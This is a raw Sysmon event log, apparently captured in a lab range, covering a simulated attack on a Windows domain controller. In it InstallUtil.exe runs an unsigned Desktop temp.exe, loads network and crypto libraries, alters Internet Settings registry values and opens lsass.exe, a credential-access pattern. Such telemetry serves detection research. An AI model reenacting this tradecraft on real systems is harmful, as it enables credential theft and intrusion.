Settings\ProxyEnableDWORD (0x00000000) 12241200x800000000000000057562597Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:50:16.732{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings 12241200x800000000000000057562596Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:50:16.732{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 12241200x800000000000000057562595Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:50:16.732{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 734700x800000000000000057562594Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.732{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=CDDE3316B3736A9613F31610AC137C9E,SHA256=545CD6206CC1CD22A7CE8B4845CFCE3E06AAD97D4334588A52F0F143CC8AD171trueMicrosoft WindowsValid 734700x800000000000000057562593Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.732{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\winnsi.dll10.0.14393.2339 (rs1_release_inmarket.180611-1502)Network Store Information RPC interfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationwinnsi.dllMD5=5777A6C6196919EBE8B73B273DF5FAF6,SHA256=062F973C688650068FD4B3E2EB0E474CE204120ED3E18CDC341C0A3E528C7839trueMicrosoft WindowsValid 12241200x800000000000000057562592Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:50:16.732{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 734700x800000000000000057562591Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.716{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\mswsock.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft Windows Sockets 2.0 Service ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmswsock.dllMD5=F18662FD1BCB04019CA35313C7BD1AB0,SHA256=44968455D3EEA914958BF90A83BA9311E9311676C32D8D46BB6109DF655738A4trueMicrosoft WindowsValid 734700x800000000000000057562590Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.716{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\winhttp.dll10.0.14393.4467 (rs1_release.210604-1844)Windows HTTP ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationwinhttp.dllMD5=F5FF215A5AE295644FE12BEAF6B75D00,SHA256=714EEB3B620CC9E368813728B1D247684519A3181211CDB5FCC37451F9BC2B96trueMicrosoft WindowsValid 734700x800000000000000057562589Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.716{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=380F0481E3BA9EA699BB6F674A500745,SHA256=ED5F6D3E1F27292480800E540E5F60CF8E8A157B52AC47ACA8B81F57F63F30F0trueMicrosoft WindowsValid 734700x800000000000000057562588Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.716{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\OnDemandConnRouteHelper.dll10.0.14393.0 (rs1_release.160715-1616)On Demand Connctiond Route HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationOnDemandConnRouteHelper.dllMD5=DF275C9659ED8215695B572A8CE17FBC,SHA256=D8F3C962E828201B361A6F634412B7BE25EC1BD3F848F259E3C996BB9572B0FBtrueMicrosoft WindowsValid 734700x800000000000000057562587Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.716{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=89AC96525FB527CDF4FFDCDF657A3923,SHA256=737BC5E7586D9AB6306949B1470DB3DBE576638A010EEF7A297126BE30841C2FtrueMicrosoft WindowsValid 734700x800000000000000057562586Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.716{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\wininet.dll11.00.14393.4583 (rs1_release.210730-1850)Internet Extensions for Win32Internet ExplorerMicrosoft Corporationwininet.dllMD5=784B673E2ECF5794AA77952B0CD9EDA3,SHA256=5C4032070D904CED9173CE28B36F48FD28F8FEECB3CA34A89020EA707A008357trueMicrosoft WindowsValid 734700x800000000000000057562585Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.701{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\ca3f8925ea2e2c087b39a31868d01790\System.Runtime.Serialization.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSystem.Runtime.Serialization.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Runtime.Serialization.dllMD5=D852391DF1D1D0ABD8DC0B947CDED66C,SHA256=B7B29E7192EE074DDF8F08F53E074813B0F2578F1464559E7359F1855ECEA751false-Unavailable 734700x800000000000000057562584Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.701{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=857A10F193FD44C58B11C90F04C4E62D,SHA256=33AB6056C7DED486E75E1D410233354A8BC326E4ABE95DF5566F68283014587BtrueMicrosoft WindowsValid 734700x800000000000000057562583Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.701{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\cryptsp.dll10.0.14393.2457 (rs1_release_inmarket.180822-1743)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=940907E5BEF86AF8B1D4C6FF2A98061E,SHA256=6F87C4B18D0A22A7A01C3F2176A18229B78106C9A7FC3F878892F0FD9706040CtrueMicrosoft WindowsValid 734700x800000000000000057562582Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.701{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives Library (Wow64)Microsoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=80F9B9D2B1258D35F129D9210DC9CE20,SHA256=9653E29AA9499123EBFA49C4BA69E345F8A10029B00B790946DDFE040436EF6DtrueMicrosoft WindowsValid 734700x800000000000000057562581Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.701{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValid 734700x800000000000000057562580Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.701{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=B745CDE6791890C571B08D4E29D9174E,SHA256=08B93AC421A1DA6CC4F0FE683F10C3B7679A42395854BB54CB63B5DFD5BF58BEtrueMicrosoft WindowsValid 734700x800000000000000057562579Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.701{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\d7dcf93739e68a3657fd4721d04b5128\System.Xml.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Xml.dllMD5=812235F8AF7F9B9495E7D163A2DB8063,SHA256=AD041BC02D6734E91C11C784E865D883262E1A2BCBFAE514481A12A660926234false-Unavailable 734700x800000000000000057562578Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.685{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\caff85b7b9f3e4e5d064c8b38b4810fb\System.Configuration.ni.dll4.8.4190.0 built by: NET48REL1LAST_BSystem.Configuration.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.dllMD5=A3B9CCA07ABA1E54B449101B4E4C1AC2,SHA256=377CFCA37B00153D96F4AF6804FAA8CD4BA76C8FAEEE4A11D23D21E9560C14C7false-Unavailable 734700x800000000000000057562577Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.685{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\7a31f084b842deabeeea41728f172462\System.Core.ni.dll4.8.4395.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Core.dllMD5=3A31931D0C2ED79A7D5DAA5EFFF0F6E7,SHA256=5941CBC9C68A2416AB0513002DC388760D7956E487C50BFC5CE2103FB9B89939false-Unavailable 734700x800000000000000057562576Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.685{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValid 734700x800000000000000057562575Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.685{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValid 734700x800000000000000057562574Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.685{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=4937BBA430F4AEEC4D0DC03A200348C3,SHA256=CDA95E98B9D37602AD11B97FDBF7BDDD2F79170CA5E140EB9D2A1B04E94E037FtrueMicrosoft WindowsValid 13241300x800000000000000057562573Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 16:50:16.685{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057562572Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 16:50:16.685{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 13241300x800000000000000057562571Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 16:50:16.685{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057562570Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 16:50:16.685{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 10341000x800000000000000057562569Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.685{8B6011A9-886B-6164-0B00-00000000F101}6489732C:\Windows\system32\lsass.exe{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057562568Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.685{8B6011A9-886B-6164-0B00-00000000F101}6489732C:\Windows\system32\lsass.exe{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 12241200x800000000000000057562567Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 16:50:16.685{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap 734700x800000000000000057562566Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.685{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=A612555310B7F2A688FA57C7C10615BC,SHA256=028B8BA6A6CF74776C8E4F7485BB7973DE25242F292F837D78AB9CFCC3E8AC90trueMicrosoft WindowsValid 734700x800000000000000057562565Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.685{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=DDB56B83B18735F13FD1CBEF877E9DB0,SHA256=C5EF7185888F971CFA486B64D71514512C1CCBAB8C5A1D8610CAE54476407126trueMicrosoft WindowsValid 734700x800000000000000057562564Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.685{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\iertutil.dll11.00.14393.4467 (rs1_release.210604-1844)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=294BC43051C27ADB96A957A6FB9448BE,SHA256=9564D3F69345F9883161007F2E26298FD377B023D1D46C0AAE9821B4B26A74B3trueMicrosoft WindowsValid 734700x800000000000000057562563Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.685{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValid 734700x800000000000000057562562Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.685{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\urlmon.dll11.00.14393.4530 (rs1_release.210705-0736)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=57F1700836CDEBA98A7CF770A15A9CF6,SHA256=781F8901F292ED968270E4605154B3B794BB3770EA7C751D94B6F3B21A5EB1C4trueMicrosoft WindowsValid 734700x800000000000000057562561Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.685{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Users\Administrator\Desktop\temp.exe0.0.0.0 --temp.exeMD5=241EFADAEB0717C0929F85B612829C47,SHA256=DA2D16A61E96095E650C6542306BCF3211A5F21736CF61F67F5A1AFA91DDF7F0false-Unavailable 734700x800000000000000057562560Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.685{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Users\Administrator\Desktop\temp.exe0.0.0.0 --temp.exeMD5=241EFADAEB0717C0929F85B612829C47,SHA256=DA2D16A61E96095E650C6542306BCF3211A5F21736CF61F67F5A1AFA91DDF7F0false-Unavailable 734700x800000000000000057562559Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.669{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\601bda4ba29a8d6b7b125b94c2697c8b\System.Configuration.Install.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.Install.dllMD5=7372BB83C92065CC175F5B104E9A505D,SHA256=56381C9335A77E1478F8F27DBB70D877FD443C41210E6F6D6E34FFDB3E5DE463false-Unavailable 734700x800000000000000057562558Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.669{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\System\2c8d66b5ef1d563cf9010bf4428ff9d2\System.ni.dll4.8.4380.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.dllMD5=88C6A31917BA9F2506E523DA037CC8DF,SHA256=15CD43739560489AEC0A752ACF5403A467319AC8E978DE279C702C74E792C5F2false-Unavailable 734700x800000000000000057562557Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.669{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValid 734700x800000000000000057562556Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.669{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValid 734700x800000000000000057562555Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.669{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Just-In-Time CompilerMicrosoft® .NET FrameworkMicrosoft Corporationclrjit.dllMD5=057E8B1C10BCFC56E238FFC109C7A01E,SHA256=E164F2C2B70575ECF5C8B266E84A6C3236C18A6F09AE09A99F59AC6B0AEAF8E8trueMicrosoft CorporationValid 734700x800000000000000057562554Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.669{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=2BDBEE1B42063F245AC86F54C236BC4E,SHA256=CD558E008DA76E171FC9B8CF87556353330D7B7BF593B5074E4FEB08BC14CFC6trueMicrosoft WindowsValid 734700x800000000000000057562553Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.669{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7ded6822b7c67ccde0dc9249bee0271b\mscorlib.ni.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft Common Language Runtime Class LibraryMicrosoft® .NET FrameworkMicrosoft Corporationmscorlib.dllMD5=7BF3C3EF641852F9D4CCF7E80B1AFF13,SHA256=C7054ABC20409CCC86D1EF10E8B11369937FB5E81DFD9F15B31639071036CA9FtrueMicrosoft CorporationValid 734700x800000000000000057562552Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.669{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValid 734700x800000000000000057562549Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.654{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\ucrtbase_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationucrtbase_clr0400.dllMD5=BFE20E1D9BEBE61CD8898663FDACB74E,SHA256=AA416A9E707BE8475051FF502D20077A687D14CF3ABABF4959F489A3B5BFBF8BtrueMicrosoft CorporationValid 734700x800000000000000057562548Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:50:16.654{8B6011A9-9B48-618E-6FFB-04000000F101}8976C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\vcruntime140_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140_clr0400.dllMD5=071309BE821483287A0FE982AEF005C1,SHA256=932920FE06897C0B2ADAF7FA855E3B45498D213994E81AB8694D9EE5CA53AC0AtrueMicrosoft CorporationValid 13241300x800000000000000057562547Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 16:50:16.654{8B6011A9-884A-6164-0100-00000000F101}4SystemHKLM\SOFTWARE\Microsoft\Windows 